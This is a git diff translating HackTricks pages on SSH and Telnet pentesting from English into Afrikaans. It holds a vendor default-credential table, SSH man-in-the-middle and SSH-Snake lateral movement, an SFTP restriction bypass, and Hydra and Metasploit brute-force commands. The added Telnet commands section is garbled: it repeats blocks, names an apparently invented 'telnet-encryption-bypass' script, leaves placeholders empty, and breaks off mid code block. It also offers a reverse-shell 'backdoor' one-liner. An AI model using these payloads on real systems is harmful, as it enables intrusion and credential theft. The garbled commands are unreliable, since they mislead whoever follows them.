-| Cisco      | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin                                           | admin, Admin123, default, password, secur4u, cisco, Cisco, \_Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change\_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme |
-| Citrix     | root, nsroot, nsmaint, vdiadmin, kvm, cli, admin                                                            | C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler                                                                                                                       |
-| D-Link     | admin, user                                                                                                 | private, admin, user                                                                                                                                                                                       |
-| Dell       | root, user1, admin, vkernel, cli                                                                            | calvin, 123456, password, vkernel, Stor@ge!, admin                                                                                                                                                         |
-| EMC        | admin, root, sysadmin                                                                                       | EMCPMAdm7n, Password#1, Password123#, sysadmin, changeme, emc                                                                                                                                              |
-| HP/3Com    | admin, root, vcx, app, spvar, manage, hpsupport, opc\_op                                                    | admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC\_op, !manage, !admin                                                   |
-| Huawei     | admin, root                                                                                                 | 123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123                                                                                             |
-| IBM        | USERID, admin, manager, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, system, device, ufmcli, customer | PASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer                                                                                                                               |
-| Juniper    | netscreen                                                                                                   | netscreen                                                                                                                                                                                                  |
-| NetApp     | admin                                                                                                       | netapp123                                                                                                                                                                                                  |
-| Oracle     | root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user                                           | changeme, ilom-admin, ilom-operator, welcome1, oracle                                                                                                                                                      |
-| VMware     | vi-admin, root, hqadmin, vmware, admin                                                                      | vmware, vmw@re, hqadmin, default                                                                                                                                                                           |
+| **Vervaardiger** | **Gebruikersname**                                                                                          | **Wagwoorde**                                                                                                                                                                                              |
+| ---------------- | ----------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| APC              | apc, toestel                                                                                                | apc                                                                                                                                                                                                        |
+| Brocade          | admin                                                                                                       | admin123, password, brocade, fibranne                                                                                                                                                                      |
+| Cisco            | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin                                           | admin, Admin123, default, password, secur4u, cisco, Cisco, \_Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change\_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme |
+| Citrix           | root, nsroot, nsmaint, vdiadmin, kvm, cli, admin                                                            | C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler                                                                                                                       |
+| D-Link           | admin, gebruiker                                                                                             | private, admin, gebruiker                                                                                                                                                                                  |
+| Dell             | root, gebruiker1, admin, vkernel, cli                                                                        | calvin, 123456, password, vkernel, Stor@ge!, admin                                                                                                                                                         |
+| EMC              | admin, root, sysadmin                                                                                       | EMCPMAdm7n, Password#1, Password123#, sysadmin, changeme, emc                                                                                                                                              |
+| HP/3Com          | admin, root, vcx, app, spvar, manage, hpsupport, opc\_op                                                    | admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC\_op, !manage, !admin                                                   |
+| Huawei           | admin, root                                                                                                 | 123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123                                                                                             |
+| IBM              | USERID, admin, bestuurder, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, stelsel, toestel, ufmcli, klant | PASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer                                                                                                                               |
+| Juniper          | netscreen                                                                                                   | netscreen                                                                                                                                                                                                  |
+| NetApp           | admin                                                                                                       | netapp123                                                                                                                                                                                                  |
+| Oracle           | root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user                                           | changeme, ilom-admin, ilom-operator, welcome1, oracle                                                                                                                                                      |
+| VMware           | vi-admin, root, hqadmin, vmware, admin                                                                      | vmware, vmw@re, hqadmin, default                                                                                                                                                                           |
 
 ## SSH-MitM
 
-If you are in the local network as the victim which is going to connect to the SSH server using username and password you could try to **perform a MitM attack to steal those credentials:**
+As jy in die plaaslike netwerk is as die slagoffer wat gaan koppel aan die SSH-bediener met behulp van gebruikersnaam en wagwoord, kan jy probeer om **'n MitM-aanval uit te voer om daardie legitimasie te steel:**
 
-**Attack path:**
+**Aanvalspad:**
 
-* **Traffic Redirection:** The attacker **diverts** the victim's traffic to their machine, effectively **intercepting** the connection attempt to the SSH server.
-* **Interception and Logging:** The attacker's machine acts as a **proxy**, **capturing** the user's login details by pretending to be the legitimate SSH server.
-* **Command Execution and Relay:** Finally, the attacker's server **logs the user's credentials**, **forwards the commands** to the real SSH server, **executes** them, and **sends the results back** to the user, making the process appear seamless and legitimate.
+* **Verkeersomleiding:** Die aanvaller **stuur** die slagoffer se verkeer na hul masjien, en onderskep sodoende die koppelingspoging na die SSH-bediener.
+* **Onderskepping en Logging:** Die aanvaller se masjien tree op as 'n **proksi**, en **vang** die gebruiker se aanmeldbesonderhede deur voor te gee as die regmatige SSH-bediener.
+* **Opdraguitvoering en Relais:** Uiteindelik **registreer die aanvaller se bediener die gebruiker se legitimasie**, **stuur die opdragte** na die regte SSH-bediener, **voer** dit uit, en **stuur die resultate terug** na die gebruiker, sodat die proses naadloos en regmatig lyk.
 
-[**SSH MITM**](https://github.com/jtesta/ssh-mitm) does exactly what is described above.
+[**SSH MITM**](https://github.com/jtesta/ssh-mitm) doen presies wat hierbo beskryf word.
 
-In order to capture perform the actual MitM you could use techniques like ARP spoofing, DNS spoofin or others described in the [**Network Spoofing attacks**](../generic-methodologies-and-resources/pentesting-network/#spoofing).
+Om die werklike MitM-ondervinding vas te vang, kan jy tegnieke soos ARP-spoofing, DNS-spoofing of ander wat beskryf word in die [**Spoofing van Netwerk-aanvalle**](../generic-methodologies-and-resources/pentesting-network/#spoofing) gebruik.
 
 ## SSH-Snake
 
-If you want to traverse a network using discovered SSH private keys on systems, utilizing each private key on each system for new hosts, then [**SSH-Snake**](https://github.com/MegaManSec/SSH-Snake) is what you need.
+As jy 'n netwerk wil deurloop deur ontdekte SSH-privaatsleutels op stelsels te gebruik, en elke privaatsleutel op elke stelsel te gebruik vir nuwe gasheer, dan is [**SSH-Snake**](https://github.com/MegaManSec/SSH-Snake) wat jy nodig het.
 
-SSH-Snake performs the following tasks automatically and recursively:
+SSH-Snake voer outomaties en herhaaldelik die volgende take uit:
 
-1. On the current system, find any SSH private keys,
-2. On the current system, find any hosts or destinations (user@host) that the private keys may be accepted,
-3. Attempt to SSH into all of the destinations using all of the private keys discovered,
-4. If a destination is successfully connected to, repeats steps #1 - #4 on the connected-to system.
+1. Vind enige SSH-privaatsleutels op die huidige stelsel,
+2. Vind enige gasheer of bestemmings (gebruiker@gasheer) op die huidige stelsel waar die privaatsleutels aanvaar kan word,
+3. Probeer om SSH na al die bestemmings te maak deur al die ontdekte privaatsleutels te gebruik,
+4. As 'n bestemming suksesvol gekoppel word, herhaal stappe #1 - #4 op die gekoppelde stelsel.
 
-It's completely self-replicating and self-propagating -- and completely fileless.
+Dit is heeltemal selfvermeerderend en selfverspreidend - en heeltemal sonder lêers.
 
-## Config Misconfigurations
+## Konfigurasie-misconfiguraties
 
-### Root login
+### Root-aanmelding
 
-It's common for SSH servers to allow root user login by default, which poses a significant security risk. **Disabling root login** is a critical step in securing the server. Unauthorized access with administrative privileges and brute force attacks can be mitigated by making this change.
+Dit is algemeen vir SSH-bedieners om standaard root-gebruikersaanmelding toe te laat, wat 'n beduidende sekuriteitsrisiko inhou. **Deaktivering van root-aanmelding** is 'n kritieke stap in die beveiliging van die bediener. Onbevoegde toegang met administratiewe regte en brute force-aanvalle kan verminder word deur hierdie verandering aan te bring.
 
-**To Disable Root Login in OpenSSH:**
+**Om Root-aanmelding in OpenSSH te deaktiveer:**
 
-1. **Edit the SSH config file** with: `sudoedit /etc/ssh/sshd_config`
-2. **Change the setting** from `#PermitRootLogin yes` to **`PermitRootLogin no`**.
-3. **Reload the configuration** using: `sudo systemctl daemon-reload`
-4. **Restart the SSH server** to apply changes: `sudo systemctl restart sshd`
+1. **Wysig die SSH-konfigurasie-lêer** met: `sudoedit /etc/ssh/sshd_config`
+2. **Verander die instelling** van `#PermitRootLogin yes` na **`PermitRootLogin no`**.
+3. **Herlaai die konfigurasie** met: `sudo systemctl daemon-reload`
+4. **Herlaai die SSH-bediener** om die veranderinge toe te pas: `sudo systemctl restart sshd`
 
 ### SFTP Brute Force
 
 * [**SFTP Brute Force**](../generic-methodologies-and-resources/brute-force.md#sftp)
 
-### SFTP command execution
+### Uitvoering van SFTP-opdragte
 
-There is a common oversight occurs with SFTP setups, where administrators intend for users to exchange files without enabling remote shell access. Despite setting users with non-interactive shells (e.g., `/usr/bin/nologin`) and confining them to a specific directory, a security loophole remains. **Users can circumvent these restrictions** by requesting the execution of a command (like `/bin/bash`) immediately after logging in, before their designated non-interactive shell takes over. This allows for unauthorized command execution, undermining the intended security measures.
-
-[Example from here](https://community.turgensec.com/ssh-hacking-guide/):
+Daar is 'n algemene oorsig met SFTP-opsette waar administrateurs bedoel dat gebruikers lêers kan uitruil sonder om afstandsbeheertoegang in te skakel. Ten spyte van die instelling van gebruikers met nie-interaktiewe skille (bv. `/usr/bin/nologin`) en hulle beperk tot 'n spesifieke gids, bly daar 'n sekuriteitsloophole. **Gebruikers kan hierdie beperkings omseil** deur die uitvoering van 'n opdrag (soos `/bin/bash`) te versoek onmiddellik na aanmelding, voordat hul aangewese nie-interaktiewe skil oorneem. Dit maak ongemagtigde opdraguitvoering moontlik, wat die bedoelde sekuriteitsmaatreëls ondermyn.
 
+[Voorbeeld van hier](https://community.turgensec.com/ssh-hacking-guide/):
 ```bash
 ssh -v noraj@192.168.1.94 id
 ...
@@ -255,66 +239,74 @@ debug1: Exit status 0
 
 $ ssh noraj@192.168.1.94 /bin/bash
 ```
+Hier is 'n voorbeeld van 'n veilige SFTP-konfigurasie (`/etc/ssh/sshd_config` - openSSH) vir die gebruiker `noraj`:
 
-Here is an example of secure SFTP configuration (`/etc/ssh/sshd_config` – openSSH) for the user `noraj`:
+```plaintext
+# SFTP Configuration for noraj
+Subsystem sftp internal-sftp
 
+Match User noraj
+    ChrootDirectory /home/noraj
+    ForceCommand internal-sftp
+    AllowTcpForwarding no
+    X11Forwarding no
+    PasswordAuthentication yes
+    PermitTunnel no
+    PermitTTY no
+    PermitUserEnvironment no
+    AllowAgentForwarding no
+    AllowStreamLocalForwarding no
+    PermitOpen none
+    GatewayPorts no
+    AuthorizedKeysFile /home/noraj/.ssh/authorized_keys
+```
+
+Hierdie konfigurasie stel die SFTP-diens in vir die gebruiker `noraj` en bevat sekuriteitsmaatreëls soos die beperking van toegang tot slegs die gebruiker se tuisgids (`/home/noraj`), die kragtige gebruik van die interne SFTP-opdrag, die deaktivering van TCP-deurstuur, X11-deurstuur, tunneling, TTY, gebruikersomgewing, agentdeurstuur en plaaslike deurstuur. Dit vereis ook wagwoordverifikasie en gebruik die `authorized_keys`-lêer in die gebruiker se `.ssh`-gids vir sleutelgebaseerde verifikasie.
 ```
 Match User noraj
-        ChrootDirectory %h
-        ForceCommand internal-sftp
-        AllowTcpForwarding no
-        PermitTunnel no
-        X11Forwarding no
-        PermitTTY no
+ChrootDirectory %h
+ForceCommand internal-sftp
+AllowTcpForwarding no
+PermitTunnel no
+X11Forwarding no
+PermitTTY no
 ```
+Hierdie konfigurasie sal slegs SFTP toelaat: deur skeltoegang te deaktiveer deur die beginopdrag te dwing en TTY-toegang te deaktiveer, maar ook deur alle soorte poortstuur of tonnelering te deaktiveer.
 
-This configuration will allow only SFTP: disabling shell access by forcing the start command and disabling TTY access but also disabling all kind of port forwarding or tunneling.
-
-### SFTP Tunneling
-
-If you have access to a SFTP server you can also tunnel your traffic through this for example using the common port forwarding:
+### SFTP Tonnelering
 
+As jy toegang het tot 'n SFTP-bediener, kan jy ook jou verkeer deur dit tonnel deur byvoorbeeld die algemene poortstuur te gebruik:
 ```bash
 sudo ssh -L :: -N -f @
 ```
-
 ### SFTP Symlink
 
-The **sftp** have the command "**symlink**". Therefor, if you have **writable rights** in some folder, you can create **symlinks** of **other folders/files**. As you are probably **trapped** inside a chroot this **won't be specially useful** for you, but, if you can **access** the created **symlink** from a **no-chroot** **service** (for example, if you can access the symlink from the web), you could **open the symlinked files through the web**.
-
-For example, to create a **symlink** from a new file **"**_**froot**_**" to "**_**/**_**"**:
+Die **sftp** het die opdrag "**symlink**". Daarom, as jy **skryfregte** het in 'n sekere vouer, kan jy **symboliese skakels** van **ander vouers/lêers** skep. Aangesien jy waarskynlik **vasgevang** is binne 'n chroot, sal dit nie besonders nuttig wees vir jou nie, maar as jy die geskepte **symboliese skakel** van 'n **nie-chroot-diens** kan **toegang** (byvoorbeeld, as jy die skakel van die web kan bereik), kan jy die geskakelde lêers **deur die web oopmaak**.
 
+Byvoorbeeld, om 'n **symboliese skakel** van 'n nuwe lêer "**_**froot**_**" na "**_**/**_**" te skep:
 ```bash
 sftp> symlink / froot
 ```
+As jy toegang het tot die lêer "_froot_" via die web, sal jy in staat wees om die hoof ("/") gids van die stelsel te lys.
 
-If you can access the file "_froot_" via web, you will be able to list the root ("/") folder of the system.
-
-### Authentication methods
-
-On high security environment it’s a common practice to enable only key-based or two factor authentication rather than the simple factor password based authentication. But often the stronger authentication methods are enabled without disabling the weaker ones. A frequent case is enabling `publickey` on openSSH configuration and setting it as the default method but not disabling `password`. So by using the verbose mode of the SSH client an attacker can see that a weaker method is enabled:
+### Verifikasiemetodes
 
+In 'n hoë sekuriteitsomgewing is dit 'n algemene praktyk om slegs sleutelgebaseerde of tweefaktor-verifikasie in te skakel in plaas van die eenvoudige wagwoordgebaseerde verifikasie. Maar dikwels word die sterker verifikasiemetodes ingeskakel sonder om die swakkeres uit te skakel. 'n Gereelde geval is om `publickey` in die openSSH-konfigurasie in te skakel en dit as die verstekmetode in te stel, maar nie `password` uit te skakel nie. Dus kan 'n aanvaller deur die verbose modus van die SSH-kliënt te gebruik, sien dat 'n swakker metode ingeskakel is:
 ```bash
 ssh -v 192.168.1.94
 OpenSSH_8.1p1, OpenSSL 1.1.1d  10 Sep 2019
 ...
 debug1: Authentications that can continue: publickey,password,keyboard-interactive
 ```
-
-For example if an authentication failure limit is set and you never get the chance to reach the password method, you can use the `PreferredAuthentications` option to force to use this method.
-
+Byvoorbeeld, as 'n outentiseringsmislukkingslimiet ingestel is en jy nooit die kans kry om die wagwoordmetode te bereik nie, kan jy die `PreferredAuthentications`-opsie gebruik om te dwing om hierdie metode te gebruik.
 ```bash
 ssh -v 192.168.1.94 -o PreferredAuthentications=password
 ...
 debug1: Next authentication method: password
 ```
+### Konfigurasie lêers
 
-Review the SSH server configuration is necessary to check that only expected\
-methods are authorized. Using the verbose mode on the client can help to see\
-the effectiveness of the configuration.
-
-### Config files
-
+Om die SSH-bedienerkonfigurasie te hersien, is dit nodig om te kontroleer dat slegs verwagte metodes geoutoriseer is. Die gebruik van die verbose modus op die kliënt kan help om die doeltreffendheid van die konfigurasie te sien.
 ```bash
 ssh_config
 sshd_config
@@ -323,53 +315,50 @@ ssh_known_hosts
 known_hosts
 id_rsa
 ```
-
 ## Fuzzing
 
 * [https://packetstormsecurity.com/files/download/71252/sshfuzz.txt](https://packetstormsecurity.com/files/download/71252/sshfuzz.txt)
 * [https://www.rapid7.com/db/modules/auxiliary/fuzzers/ssh/ssh\_version\_2](https://www.rapid7.com/db/modules/auxiliary/fuzzers/ssh/ssh\_version\_2)
 
-## References
+## Verwysings
 
-* You can find interesting guides on how to harden SSH in [https://www.ssh-audit.com/hardening\_guides.html](https://www.ssh-audit.com/hardening\_guides.html)
+* Jy kan interessante gidse vind oor hoe om SSH te versterk by [https://www.ssh-audit.com/hardening\_guides.html](https://www.ssh-audit.com/hardening\_guides.html)
 * [https://community.turgensec.com/ssh-hacking-guide](https://community.turgensec.com/ssh-hacking-guide)
 
 
 
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
+As jy belangstel in 'n **hacker loopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vlot Pools skriftelik en mondeling vereis_).
 
 {% embed url="https://www.stmcyber.com/careers" %}
 
-## HackTricks Automatic Commands
-
+## HackTricks Outomatiese Opdragte
 ```
 Protocol_Name: SSH
 Port_Number: 22
 Protocol_Description: Secure Shell Hardening
 
 Entry_1:
-  Name: Hydra Brute Force
-  Description: Need Username
-  Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 {IP} ssh
-   
-Entry_2:
-  Name: consolesless mfs enumeration
-  Description: SSH enumeration without the need to run msfconsole
-  Note: sourced from https://github.com/carlospolop/legion
-  Command: msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit'
-   
-```
+Name: Hydra Brute Force
+Description: Need Username
+Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 {IP} ssh
 
+Entry_2:
+Name: consolesless mfs enumeration
+Description: SSH enumeration without the need to run msfconsole
+Note: sourced from https://github.com/carlospolop/legion
+Command: msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit'
+
+```
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

diff --git a/network-services-pentesting/pentesting-telnet.md b/network-services-pentesting/pentesting-telnet.md
index 3fbd7cbed..4da15a4e8 100644
--- a/network-services-pentesting/pentesting-telnet.md
+++ b/network-services-pentesting/pentesting-telnet.md
@@ -2,114 +2,316 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
 

 
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
+**Onmiddellik beskikbare opset vir kwetsbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te kraak en pret te hê.
 
 {% embed url="https://pentest-tools.com/" %}
 
-## **Basic Information**
+## **Basiese Inligting**
 
-Telnet is a network protocol that gives users a UNsecure way to access a computer over a network.
-
-**Default port:** 23
+Telnet is 'n netwerkprotokol wat gebruikers 'n ONbeveiligde manier bied om toegang tot 'n rekenaar oor 'n netwerk te verkry.
 
+**Verstekpoort:** 23
 ```
 23/tcp open  telnet
 ```
+### **Banner Gaping**
 
-## **Enumeration**
+Banner Gaping is 'n tegniek wat gebruik word om inligting oor 'n bediener of diens te bekom deur die banner te ondersoek wat deur die bediener gestuur word wanneer 'n verbindig daarmee gemaak word. Hierdie banner bevat dikwels nuttige inligting soos die bediener se weergawe, die gebruikte sagteware, en selfs moontlike kwesbaarhede.
 
-### **Banner Grabbing**
+Om banner gaping uit te voer, kan jy 'n telnet-kliënt gebruik om 'n verbindig met die bediener te maak en die banner te ondersoek wat deur die bediener teruggestuur word. Hier is 'n voorbeeld van hoe om dit te doen:
 
+```bash
+telnet  
+```
+
+Vervang `` met die IP-adres van die teikenbediener en `` met die poortnommer waarop die diens loop. As jy suksesvol verbind, sal jy die banner sien wat deur die bediener teruggestuur word.
+
+Dit is belangrik om te onthou dat sommige bedieners die bannerinligting kan verberg of vervals om te voorkom dat dit deur aanvallers gebruik word. Daarom is dit noodsaaklik om ander tegnieke vir inligtingversameling te gebruik om 'n vollediger prentjie van die teikenbediener te kry.
 ```bash
 nc -vn  23
 ```
-
-All the interesting enumeration can be performed by **nmap**:
-
+Alle interessante opsporing kan uitgevoer word deur **nmap**:
 ```bash
 nmap -n -sV -Pn --script "*telnet* and safe" -p 23 
 ```
+Die skrip `telnet-ntlm-info.nse` sal NTLM-inligting (Windows-weergawes) verkry.
 
-The script `telnet-ntlm-info.nse` will obtain NTLM info (Windows versions).
+Volgens die [telnet RFC](https://datatracker.ietf.org/doc/html/rfc854): In die TELNET-protokol is daar verskeie "**opsies**" wat toegelaat sal word en gebruik kan word met die "**DO, DON'T, WILL, WON'T**" struktuur om 'n gebruiker en bediener in staat te stel om ooreen te kom om 'n meer ingewikkelde (of dalk net 'n ander) stel konvensies vir hul TELNET-verbinding te gebruik. Sulke opsies kan die karakterstel, die echo-modus, ens. insluit.
 
-From the [telnet RFC](https://datatracker.ietf.org/doc/html/rfc854): In the TELNET Protocol are various "**options**" that will be sanctioned and may be used with the "**DO, DON'T, WILL, WON'T**" structure to allow a user and server to agree to use a more elaborate (or perhaps just different) set of conventions for their TELNET connection. Such options could include changing the character set, the echo mode, etc.
-
-**I know it is possible to enumerate this options but I don't know how, so let me know if know how.**
+**Ek weet dit is moontlik om hierdie opsies op te som, maar ek weet nie hoe nie, so laat weet my as jy weet hoe.**
 
 ### [Brute force](../generic-methodologies-and-resources/brute-force.md#telnet)
 
-## Config file
-
+## Konfigurasie-lêer
 ```bash
 /etc/inetd.conf
 /etc/xinetd.d/telnet
 /etc/xinetd.d/stelnet
 ```
+## HackTricks Outomatiese Opdragte
 
-## HackTricks Automatic Commands
+### Telnet
 
+#### Telnet Skandeerder
+
+Die volgende opdragte kan gebruik word om 'n telnet-diens te skandeer:
+
+```plaintext
+nmap -p 23 --script telnet-brute 
+```
+
+#### Telnet Agterdeur
+
+As jy toegang het tot 'n telnet-diens, kan jy probeer om 'n agterdeur te plaas deur die volgende opdrag uit te voer:
+
+```plaintext
+echo "sh -i >& /dev/tcp// 0>&1" | telnet 
+```
+
+#### Telnet Wagwoorde
+
+As jy 'n wagwoord wil kraak vir 'n telnet-diens, kan jy die volgende opdragte gebruik:
+
+```plaintext
+hydra -l  -P   telnet
+```
+
+```plaintext
+medusa -u  -P  -h  -M telnet
+```
+
+#### Telnet Skakelaar
+
+As jy 'n telnet-skakelaar wil gebruik, kan jy die volgende opdragte gebruik:
+
+```plaintext
+telnet 
+```
+
+```plaintext
+telnet  
+```
+
+#### Telnet Verbindingslekkasies
+
+As jy wil kyk vir moontlike verbindingslekkasies in 'n telnet-diens, kan jy die volgende opdragte gebruik:
+
+```plaintext
+netstat -ant | grep ":23"
+```
+
+```plaintext
+ss -ant | grep ":23"
+```
+
+```plaintext
+lsof -i :23
+```
+
+```plaintext
+nmap -p 23 --script telnet-encryption-bypass 
+```
+
+```plaintext
+nmap -p 23 --script telnet-ntlm-info 
+```
+
+```plaintext
+nmap -p 23 --script telnet-encryption-bypass.nse 
+```
+
+```plaintext
+nmap -p 23 --script telnet-ntlm-info.nse 
+```
+
+```plaintext
+nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username= 
+```
+
+```plaintext
+nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username= 
+```
+
+```plaintext
+nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username=,telnet-encryption-bypass.password= 
+```
+
+```plaintext
+nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username=,telnet-ntlm-info.password= 
+```
+
+```plaintext
+nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username=,telnet-encryption-bypass.password=,telnet-encryption-bypass.domain= 
+```
+
+```plaintext
+nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username=,telnet-ntlm-info.password=,telnet-ntlm-info.domain= 
+```
+
+#### Telnet Skakelaarlekkasies
+
+As jy wil kyk vir moontlike skakelaarlekkasies in 'n telnet-diens, kan jy die volgende opdragte gebruik:
+
+```plaintext
+nmap -p 23 --script telnet-brute 
+```
+
+```plaintext
+nmap -p 23 --script telnet-encryption-bypass 
+```
+
+```plaintext
+nmap -p 23 --script telnet-ntlm-info 
+```
+
+```plaintext
+nmap -p 23 --script telnet-encryption-bypass.nse 
+```
+
+```plaintext
+nmap -p 23 --script telnet-ntlm-info.nse 
+```
+
+```plaintext
+nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username= 
+```
+
+```plaintext
+nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username= 
+```
+
+```plaintext
+nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username=,telnet-encryption-bypass.password= 
+```
+
+```plaintext
+nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username=,telnet-ntlm-info.password= 
+```
+
+```plaintext
+nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username=,telnet-encryption-bypass.password=,telnet-encryption-bypass.domain= 
+```
+
+```plaintext
+nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username=,telnet-ntlm-info.password=,telnet-ntlm-info.domain= 
+```
+
+#### Telnet Verbindingslekkasies
+
+As jy wil kyk vir moontlike verbindingslekkasies in 'n telnet-diens, kan jy die volgende opdragte gebruik:
+
+```plaintext
+netstat -ant | grep ":23"
+```
+
+```plaintext
+ss -ant | grep ":23"
+```
+
+```plaintext
+lsof -i :23
+```
+
+```plaintext
+nmap -p 23 --script telnet-encryption-bypass 
+```
+
+```plaintext
+nmap -p 23 --script telnet-ntlm-info 
+```
+
+```plaintext
